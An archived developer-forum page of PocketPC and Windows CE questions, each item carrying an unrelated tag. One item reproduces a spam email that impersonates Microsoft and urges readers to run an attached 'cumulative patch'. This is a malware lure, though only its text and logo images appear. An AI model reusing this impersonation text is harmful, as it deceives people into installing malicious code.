Constants used with the INF file.

TheMSsForum.com: The Microsoft Software Forum

  • The MSS Forum ‹ PocketPC Developer
    • Archive
      • Biz
      • MCSE
      • CRM
      • Drivers
      • Framework
      • ADO
      • ASP
      • Compact
      • Forms
      • Dotnet
      • C#
      • VB
      • FontpageGen
      • Excel
      • WorkSheet
      • Exchange
      • Setup
      • Fox
      • Fontpage
      • ASP
      • IIS
      • Entourage
      • Money
      • Messanger
      • PocketPC
      • Powerpoint
      • Project
      • Publisher
      • Excel
      • VB
      • Security
      • Portal
      • Services
      • SQLServerDev
      • SVCS
      • SQLServer
      • VB
      • VC
      • MFC
      • ExcelGen
    • Previous
      • 1
        • how can I let FileExplore show extension of file? Also how can I let it show the hidden files (eg. the driver files) to me? I can explore them via the browse function of ActiveAsync, but I do like to know how can I do that with my PocketPC only. Thanks. Tag: Constants used with the INF file. Tag: 65520
      • 2
        • .net cf equivalent what's the .net cf equivalent of sendmessage? pocket pc 2002 is the os. tia, steve Tag: Constants used with the INF file. Tag: 65519
      • 3
        • SqlCeReplication property values for replicating a SQL Server db via IIS using VS.NET 2003 - in order to create the database for my PPC, all of the following have to be correct for the replication process to work; oRpl = new SqlCeReplication(); oRpl.Publisher = ""; oRpl.PublisherLogin = ""; oRpl.PublisherPassword = ""; oRpl.InternetUrl = "http://PPC_db_shuttle/sscesa20.dll"; oRpl.InternetLogin = ""; oRpl.InternetPassword = ""; oRpl.Subscriber = ""; oRpl.Publication = ""; oRpl.PublisherDatabase = "" is there a "paint by number" kind of explanation for each of the properties above? SQLServerCE online help isn't very helpful. Like this; "The PublisherLogin property specifies the login name used when connecting to the Publisher." O.K?? !!! or "The InternetPassword property specifies the Microsoft® Internet Information Services (IIS) password used when connecting to the SQL Server CE Server Agent." and where do I find this?? !! A picture would be so so helpful for each one of these properties eg. a screenshot from Enterprise Manager or IIS as appropriate. That would be HUGE ly helpful. I have read some very helpful knowledgebases and explanations but none that have really helped me on my WinXP Pro dev machine. I "think" I can guess where to get Publisher and Subscriber .... and then my confidence drops off sharply after that; thank you, -Greg ps. I posted this previously in the sqlserverce newsgroup but i was given info that was usefull, but info I already had which gave instructions for win2k and RDA, and general security concepts, but not specifically for this replication process. Tag: Constants used with the INF file. Tag: 65518
      • 4
        • 2003 Emulator Memory Setting Broken? Supposedly, the Pocket PC 2003 emulator can be invoked from the command line with a /MemorySize switch that allows the emulator up to 256 MB of memory. However, Start -> Settings -> System -> Memory indicates "Total main memory: 43.68 MB" whether I start the emulator with 64 MB memory or 256 MB memory. I also noticed a "Memory" key in the registry for the Pocket PC 2003 emulator that I tried bumping to 256 from 64. To see how much memory was available in practice, I wrote a C program that counts how many 1 MB memory chunks can be allocated in a row. I was only able to allocate 28 1 MB chunks. My desktop system is Win2K with over 1280 MB RAM so available memory should not be an issue. We saw the same behavior on a Windows XP Professional machine with 512 MB memory. Is the /MemorySize switch on the Pocket PC 2003 emulator broken or do I need to try something different? Thanks, Mike Tag: Constants used with the INF file. Tag: 65517
      • 5
        • evc memory leak Hi, I'm programming in .net, but had to create a dll in c++ to use xslt. However, my function has a memory leak! Not being much of a c++ programmer, i don't really know where to start looking. Can anyone help? Thanks, Gareth. function is: EXPORTED int transform(LPWSTR lpXmlBuffer, int cbXmlBuffer,LPWSTR lpXslBuffer, int cbXslBuffer,LPWSTR lpHtmlBuffer, int cbHtmlBuffer){ CoInitializeEx(NULL,COINIT_MULTITHREADED); int iHtmlLen = 0; MSXML::IXMLDOMDocument *iXMLDoc = NULL; MSXML::IXMLDOMDocument *iXSLDoc = NULL; MSXML::IXMLDOMParseError *pParsingErr = NULL; MSXML::IXMLDOMElement *iXMLElm = NULL; MSXML::IXMLDOMElement *iXSLElm = NULL; MSXML::IXMLDOMNodeList *iXMLChild = NULL; MSXML::IXMLDOMNode *iXMLItem = NULL; HRESULT hr; short tEmpty; BSTR bStr; VARIANT vXMLSrc; VARIANT_BOOL vSuccess; VariantInit( &vXMLSrc ); hr = CoInitializeEx(NULL,COINIT_MULTITHREADED); if(!SUCCEEDED(hr)) return 0; hr = CoCreateInstance (MSXML::CLSID_DOMDocument, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER, MSXML::IID_IXMLDOMDocument,(LPVOID *)&iXMLDoc); hr = CoCreateInstance (MSXML::CLSID_DOMDocument, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER, MSXML::IID_IXMLDOMDocument,(LPVOID *)&iXSLDoc); if(iXMLDoc && iXSLDoc) { iXMLDoc->put_async(VARIANT_FALSE); iXSLDoc->put_async(VARIANT_FALSE); // Pocket PC workaround: // Remove document safety options IObjectSafety* pSafety; DWORD dwSupported, dwEnabled; if ( SUCCEEDED(iXMLDoc->QueryInterface( IID_IObjectSafety, (void**)&pSafety ) ) ) { pSafety->GetInterfaceSafetyOptions (MSXML::IID_IXMLDOMDocument, &dwSupported, &dwEnabled ); pSafety->SetInterfaceSafetyOptions (MSXML::IID_IXMLDOMDocument, dwSupported, 0 ); } if ( SUCCEEDED(iXSLDoc->QueryInterface( IID_IObjectSafety, (void**)&pSafety ) ) ) { pSafety->GetInterfaceSafetyOptions (MSXML::IID_IXMLDOMDocument, &dwSupported, &dwEnabled ); pSafety->SetInterfaceSafetyOptions (MSXML::IID_IXMLDOMDocument, dwSupported, 0 ); } // The next Line loads XML directly into the parser iXMLDoc->loadXML(lpXmlBuffer, &tEmpty); iXSLDoc->loadXML(lpXslBuffer, &tEmpty); iXMLDoc->get_documentElement(&iXMLElm); iXSLDoc->get_documentElement(&iXSLElm); iXMLDoc->transformNode(iXSLElm, &bStr); //I think the next line needs freeing (memory at bStr) iHtmlLen = wcslen(bStr); iHtmlLen = min(cbHtmlBuffer, iHtmlLen); wcsncpy(lpHtmlBuffer, bStr, iHtmlLen); } return iHtmlLen; } Tag: Constants used with the INF file. Tag: 65513
      • 6
        • PCMICA device detectionr help I am developing a driver for a PCMCIA card (not a storage card). The first thing is to register a key under HK_LOCAL_MACHINE\PCMCIA\Detect\92 for my driver DLL and the DetectMyDriverentry. And the detect function has the following format: LPTSTR DetectMyDriver(CARD_SOCKET_HANDLE hSocket, UCHAR type,LPTSTR key,DWORD keyLen). The question is: what should I do to determine whether the card is my card? Thanks. Tag: Constants used with the INF file. Tag: 65510
      • 7
        • Application Delivery I created the .cab file. How can I trigger the device's CAB installer to autorun my .cab file as soon as I send the .cab file to the device by using either ActiveSync or network connection. Can someone point me to the right direction. Thanks in advance. Tag: Constants used with the INF file. Tag: 65506
      • 8
        • Ce.NET Vs PPC .Net Can someone explain the main differences between PPC 2002/3 and Windows CE.Net. I've been developing a SQL Server CE based application for PPC2K and now find I have to port the application over to Windows CE .net but I am experiencing problems. Specifically I find that many of the methods are missing in the SQL Server CE dlls such as the Engine.Create for setting the DB up. Any help is appreciated. Thanks. Tag: Constants used with the INF file. Tag: 65505
      • 9
        • Centralized Exception Handling Hi, Is there a way to centralize exception handling by catching untrapped exception. "ThreadException" event is unfortunately not supported by the .NET compact framework. Maybe a solution through platform invokes ? Any help will be appreciated. Thanks Greg Tag: Constants used with the INF file. Tag: 65502
      • 10
        • RDA Pull - can anyone tell me what I am doing wrong. This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C38835.3FDE8DE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The scenario is as follows: 1.. I installed MSDE 2000 using sql2kdesksp3.exe, with the command: setup SAPWD=3D"..." SECURITYMODE=3DSQL 2.. I installed SQL Server CE using SQLCE.exe. c.. I applied the patch sql20sql2ksp3a.exe, to configure IIS. d.. I downloaded SQL CE to a PocketPC 2002 device, and successfully migrated an ADOCE program. e.. I successfully tested the URL http://.../sscesa20.dll, using = Pocket IE. f.. But when I try an RDA pull, I get error 29022: The version of the Microsoft OLEDB Provider for SQL Server is not = correct. g.. ODBC says that the version of SQL Server is 2000.81.9041.40 My code is: Private Const SDF As String =3D _ "Data Source=3D\My Documents\....sdf" Private Const SQL As String =3D _ "Driver=3D{SQL = Server};Server=3D...;UID=3Dsa;Password=3D...;Database=3Dmaster" Private Sub Form_Activate() Dim RDA As SSCE.RemoteDataAccess Set RDA =3D CreateObject("SSCE.RemoteDataAccess.2.0") =20 RDA.InternetURL =3D "http://...dll" RDA.LocalConnectionString =3D SDF RDA.InternetLogin =3D "" RDA.InternetPassword =3D "" =20 On Error Resume Next =20 RDA.Pull "PRODUCTS", "select ProductID, Description from PRODUCTS", = SQL --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.520 / Virus Database: 318 - Release Date: 18/09/03 ------=_NextPart_000_0012_01C38835.3FDE8DE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2800.1226" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY> <DIV><FONT face=3DArial>The scenario is as follows:</FONT></DIV> <OL> <LI><FONT face=3DArial>I&nbsp;installed MSDE 2000 using = sql2kdesksp3.exe, with=20 the command:</FONT><FONT face=3DArial><BR>setup SAPWD=3D"<I>...</I>"=20 SECURITYMODE=3DSQL</FONT></LI> <LI><FONT face=3DArial size=3D2><FONT size=3D3>I installed SQL Server = CE using=20 SQLCE.exe.</FONT></LI> <LI><FONT face=3DArial size=3D3>I&nbsp;applied the = patch&nbsp;sql20sql2ksp3a.exe,=20 to configure IIS.</FONT></LI> <LI><FONT size=3D3>I downloaded SQL CE to a PocketPC 2002 = device,<BR>and=20 successfully&nbsp;migrated an&nbsp;ADOCE&nbsp;program.</FONT></LI> <LI><FONT size=3D3>I successfully tested the URL = http://.../sscesa20.dll, using=20 Pocket IE.</FONT></LI> <LI><FONT size=3D3>But when I try an RDA pull, I get error=20 <STRONG>29022</STRONG>:<BR>The version of the Microsoft OLEDB Provider = for SQL=20 Server is not correct.</FONT></LI> <LI><FONT size=3D3>ODBC says that the version of SQL Server is=20 2000.81.9041.40</FONT></LI></OL> <DIV><FONT size=3D3>My code is:</FONT></DIV> <DIV><BR><FONT size=3D3>Private Const SDF As String =3D _<BR>"Data = Source=3D\My=20 Documents\....sdf"</FONT></DIV> <DIV><FONT size=3D3></FONT>&nbsp;</DIV> <DIV><FONT size=3D3>Private Const SQL As String =3D _<BR>"Driver=3D{SQL=20 Server};Server=3D...;UID=3Dsa;Password=3D...;Database=3Dmaster"</FONT></D= IV> <DIV><FONT size=3D3></FONT>&nbsp;</DIV> <DIV><FONT size=3D3>Private Sub Form_Activate()<BR>&nbsp; Dim RDA As=20 SSCE.RemoteDataAccess</FONT></DIV> <DIV><FONT size=3D3></FONT>&nbsp;</DIV> <DIV><FONT size=3D3>&nbsp; Set RDA =3D=20 CreateObject("SSCE.RemoteDataAccess.2.0")<BR>&nbsp; <BR>&nbsp; = RDA.InternetURL =3D=20 "http://...dll"<BR>&nbsp; RDA.LocalConnectionString =3D SDF<BR>&nbsp;=20 RDA.InternetLogin =3D ""<BR>&nbsp; RDA.InternetPassword =3D ""<BR>&nbsp; = <BR>&nbsp;=20 On Error Resume Next<BR>&nbsp; <BR>&nbsp; RDA.Pull "PRODUCTS", "select=20 ProductID, Description from PRODUCTS", SQL<BR></DIV> <DIV>&nbsp;</DIV> <DIV>&nbsp;</DIV> <DIV><BR>---<BR>Outgoing mail is certified Virus Free.<BR>Checked by AVG = anti-virus system (<A=20 href=3D"http://www.grisoft.com">http://www.grisoft.com</A>).<BR>Version: = 6.0.520 /=20 Virus Database: 318 - Release Date: = 18/09/03</FONT></FONT></DIV></BODY></HTML> ------=_NextPart_000_0012_01C38835.3FDE8DE0-- Tag: Constants used with the INF file. Tag: 65501
      • 11
        • Install correction patch --riyezopzmqqxvvl Content-Type: multipart/related; boundary="hhwrmulcdxuzgw"; type="multipart/alternative" --hhwrmulcdxuzgw Content-Type: multipart/alternative; boundary="wuqieccwdqladrbym" --wuqieccwdqladrbym Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Partner this is the latest version of security update, the "October 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to maintain the security of your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your computer. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. ---------------------------------------------- The names of the actual companies and products mentioned = herein are the trademarks of their respective owners. Copyright 2003 Microsoft Corporation. --wuqieccwdqladrbym Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp; <FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </B></I></FONT> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP> <FONT color=3D"#ffffff" size=3D1>&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>&nbsp; </FONT> </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <FONT FACE=3D"Verdana, Arial" SIZE=3D1><B> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>&nbsp;&nbsp;</B> </FONT> </TD> </TR> </TABLE> &nbsp;<IMG SRC=3D"cid:apxoykv" BORDER=3D"0"><BR><BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Partner<BR><BR> this is the latest version of security update, the "October 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to maintain the security of your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your computer. This update includes the functionality = of all previously released patches. </FONT></TD></TR> </TABLE> <BR><BR> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:hyxnnic" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B> </FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:hyxnnic" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B> </FONT></TD><TD NOWRAP> <FONT SIZE=3D"1"> MS Internet Explorer, version 4.01 and later<BR> MS Outlook, version 8.00 and later<BR> MS Outlook Express, version 4.01 and later </FONT> </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:hyxnnic" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch = at the earliest opportunity.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:hyxnnic" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Run attached file. = Choose Yes on displayed dialog box.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:hyxnnic" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">You don't need to do = anything after installing this item.</FONT></TD> </TR> </TABLE> <BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> <BR><BR> Thank you for using Microsoft products.<BR><BR></FONT> <FONT SIZE=3D"1">Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies.<BR></FONT> <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> <FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners.</FONT> </TD></TR></TABLE> <BR> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </FONT></B> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"> &copy;2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A> &nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A>&nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> --wuqieccwdqladrbym-- --hhwrmulcdxuzgw Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <apxoykv> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r 9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV 606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg 4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD JHX5UiagQILcNMtKl26zu3etuBgUaKcePXv0QIo0iSjaw8raROKYh6nbuFbmVpVlpbKby4Mya858 eWrlrV0l/fECWDBhw4hPimoJUw9NQVa0Yg6kk6dPmD9xt/Xi52kgKG4GCRLtpTjZNmZTQ5yktLXT QFNDA+qJe2wkkgkrrmWrx4tv0X6M/gvFrnzh6uaO+wCKOhzs7TzWyUesyDom7z9//EAKOh51eYKK sdWWH1D15cd78J12GFJKufRXcfwNNtR/ANYXE006UfdSfBQq1lxM3fFHWFlojRBCCA5goMMK5y3V 1B879VGdUMlRqIxaG7kUmHEikVTjQyuAcGIGDmSQwQUYzPBAA1UIKJMfUCI4Vhs2EjTJKrWYwogp mXSxY0iTTLhQAC2ocKIDHGywgAwYWPDAm3AeIIVztr3E1FiFVSnQJLXc4ksxuujyiy6npNGFYBKK WRAzKZipAgkp8ACCAyLg0MClDcD5ppIUVNCFFDL1oSF8Qvn3nyi8+KIqMH8aQwwx/66EMQcoVQxG mI/KBEBCCCSo0MIPLJSJwA6YFvsmBlFkYgopUTxwgQ8XXGBBBRUA0QUXeJp6qi2r2rKLLcAU42qs WIRhR623YpdDNM4wQ0IOInggrwfFNoCDDl20wooqqaSCCil3SHCBBgQXnAGbFmCAgQMkBKDnLsMU 4wswvPCySy3DuLpJGFiY4YodX6RrUhnOIFDDvPNeqkkXfKzCyssv8+svwM5uYPPNONusAZszEEEE GoooQsfQdRRdxyJII83I0ow04nQjjkTtCB5cVN3KMBEXA8wuFbMC6Cu5jIJFLsG4oonIQeQQQw4o a5KsI6moogrMMMvt77+kCPzB3v589+03BxdQ0IFyotyCdTFap7I1K7Z4YskmcIwSTC+9KMHGSD6S 0AIJHkRxByekkIJKv3LPXbfMeOddgQmst+466xoAIUEEEUzAQNBD02H00UkvwnTTT0s9ddV4ZPEK 1hH/qTUnlyDyRi659BJMMLiEgrkoQSwTAjMefPIJ6KKPHnfppfeLCt6cCDFDmjT8AMP7MJywwQW0 1187Aco5osUYyGNtjC+ccFwhzuCK6U0OF2uoQht8FAMEoMADnfge+M7Xrwpa8HyhI0X6JGCwDGhg fvYLoe1wRzSj9c53THsa1KRGNS6oYQxZ0AXyjKGLUlzCEoeIQxjIRjnKTYESC/7EnjJyYAIRRMF7 4Auf+Cp4vtRxghNOiEAHjxTC+k3gfsp5ghPSAIqMBeoUlkjEIeYgBzjwEBdonEIOgmgWSDlgC0h8 YgabSEcncuITUZQBwYxERftRYAIToEDtbie0EhbthL9TofBa6IT9jeEVgQpUJcZoCDEUcHqUw8UU ysBGZZQgBAvAgSfimMQMmjJ0T/SeGiKgRw3w8QKz+2Mgp/UALKamC1FYwha1AElJzkEMYiDb5HqB wE2SRIjR0MEIGoCJUUqwlKd84h0/4QlMRKACezQSLAM5A2pR6wF/JGTudofIFAaPhVW7AxWooIX9 ZSELv4hnJYA5CjQScw1rUP/jMQeCgA/gQA2ecOYzpUnQaVKzmtfM5pEkMIFpebMCtZwA/lJTBR88 YQlRcIITQBHPeNrhCEcwQhPQmM8EALEkAwnBDTBAhWYG1HukTCVMD4oJTBDBAgrNAEOnZYE/vomh 4jQk75KWyHNGrYWO0KUT1tlOWnRUCUdQQhOaoIQ12GEKsVCgEAVSAge88RIufelMxxrQal7iEkLg oCv5uFOffvOPE0XMMvjggy74IAoZ3UI8aYEEJUh1CkoggxIOUIbCbFUZyczADM4K1rI69rHVxARj kyDFtRppp9OawR8pAFQS6s6EvSuq0xZZNS444gkZ1SgVQkELWvjMr1QlQgT+pgALG+yTIDrgwAPo wFiwhtWxNZUsYxVBWYX6YAYT0CwgHwDRB0i0PNGoghTsCoQoaEIYQhCCz7ZLhCYoIAdD+ZEyQqAB C4xBEb09a3Brmt5LBE0RWYiAB/mo2EBSoJvfdG5QP3vI0JpztOgsLR8y8QTU4jUK2U2wEIagBAWU AQy3JcgIUqSF97b3wu9VhCXQwErLKpYCDvXmmygQV+UEQLpScKUPfACEFjuBCGuAhQ4gXBLxIjZa QrBEhtGL3rPyOMOWCHIiOkxfCzT0oc2lwH7J6d+lKTLAVfPIdAu8hCUAwQlCIIMBikAJCEeYIMm4 gAxmkIggB3nHOzazJcb+QIXZ6bHIIPZmT0FMYj2RyUw50EEZRIAASnzheoctSJEekIgyq/nQalaE E2QXAYHlFANx1iyILYDcJYOWqP9d4VFLi62PgEQkGAl1mI5p44HcYMxoQISqC21oIYcxDUuowOwk IAMOTDEDGAAnBR5gARyAE5Al1pMytIM5UiuEBxWwQBIOoepmO1sRd/BBBWgnMGo9a758xECmcOBr QE5Av55lMqadbNThldYjX/h0qEVyvVIDiFpEOIS85b3qOjBBBrODgL4foCZoWVsG2cZAt5fL7ToL WyAVWeAxA42QScjgAkQoRCHmrYhGgDAC+s54AjbAAQ4s4GDeFHOuvf3/ABwMQBgiUHK4L620TJP2 3J7WSEhG1MmJRKILsJzDxBfxhfLWL+MZn4AGOm5rgj2cWrJ8wAB2sAMRFEMYBtcTRUpCdXcbZDV8 sIAExoAHHuA7At2sYv3Q5PEOQmvXTE/7DlCu8kLyd6gtJzeANw3zPaRb5uwOIkoV0gY2SNsCgG+0 DFJwJFhWMbkDK7qHRcD4xjMeBxMoQAGEHYSpWz0hPlhANHxggWtyYBnMQAYIKvBwCZj+9GCHqAUc kFMdOF4EOzBAAXoA2JX3d9zAm7u5oxxzW4164doaiAM0rwwU0IAHz4hGAEDfAjH74PTQn4G0EpAA Z9HX9Y03wAEKcIAB/oDAYQc/CQkcEIBoPAMGzoDBM2KwfGa0QAMXOBLg5y8B6V/gAVNowhQogIEV 61kEDXAAPdADTVAJaKBjtgd3KCR3mrZ7nWZ36kZzx0QIV5AQGNAC5Xd+x6B+7Md8KYBN0oZkziIt E4AAKTAACtBQ8ZIA3NcBKrAMMRB+RfEAzLAM0aAMz/ACLwANyrcMyNACKXABCwA40VKEFPBwRtYE cjAHhmAEU5AAAzgFYjAHrHZmCVhODPhyvAeBtkJzNUYIs5AQNLgM5VeBV9CDoQeEIZABICADbviG FBAtRqYAzCAQAVACOSAACFACMngYFqACNRgAgiiIy+CDLQCEJCAD/yWgAV7ViHF4ATOQAFMABxI3 cWM0B6tWhQjoduIWd7nXgC20hXfHbkOBPRSYECFgAchQg4VYiMyQhikAAjdwAStgAydyIm1yARVA AQXQASvQhzYSAA2AAav4iq/4g0AYiyRwATRQAiqgAggwAxYgA7t4AAcQAjcIjBTSAgYwAySADOB4 iMkoi7uCAQuQJBYgZj3FfQOwDNpYJSnQAROAAZozjuS4AAsAfzLgAGzyACzYfXX4jlVSAmVAfQ+w MCRgAyRAAvhIMCmCXNtXAAYQAu4okHryAzaAARNgjQYJJxNAfRF5AAaQAy2QjRYpdWBQBV2QawrA gpLHfQpgAA1ggiMrYJInKWxIsRhfUAU82ZMj0Iwr8AM3qY3E9ntVV3lDWSUBAQA7 --hhwrmulcdxuzgw Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <hyxnnic> R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St 3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7 zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza 